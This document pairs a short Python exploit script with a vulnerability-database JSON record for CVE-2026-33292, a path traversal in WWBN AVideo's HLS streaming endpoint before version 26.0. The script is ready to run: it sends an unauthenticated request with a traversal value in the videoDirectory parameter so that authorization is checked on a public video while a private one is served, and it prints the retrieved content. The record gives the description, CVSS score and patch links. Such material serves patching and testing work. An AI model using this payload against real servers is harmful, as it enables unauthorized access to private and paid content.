CVE-2026-33292

import requests # Target URL of the vulnerable endpoint target_url = "http://example.com/view/hls.php" # The payload exploits the split-oracle condition. # The authorization logic truncates at the first '/', checking 'public_video_id'. # The file access logic processes the full path, traversing to 'private_secret_video'. payload_params = { "videoDirectory": "public_video_id/../../private_videos/private_secret_video", "file": "segment.m3u8" } try: # Send unauthenticated request response = requests.get(target_url, params=payload_params, timeout=10) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Retrieved content snippet:") print(response.text[:500]) else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33292", "sourceIdentifier": "[email protected]", "published": "2026-03-22T17:17:08.753", "lastModified": "2026-03-23T16:18:24.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths — one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) — creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, el endpoint de streaming HLS ('view/hls.php') es vulnerable a un ataque de salto de ruta que permite a un atacante no autenticado transmitir cualquier video privado o de pago en la plataforma. El parámetro GET 'videoDirectory' se utiliza en dos rutas de código divergentes — una para la autorización (que trunca en el primer segmento '/') y otra para el acceso a archivos (que conserva las secuencias de salto '..') — creando una condición de 'oráculo dividido' donde la autorización se verifica contra un video mientras que el contenido se sirve desde otro. La versión 26.0 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}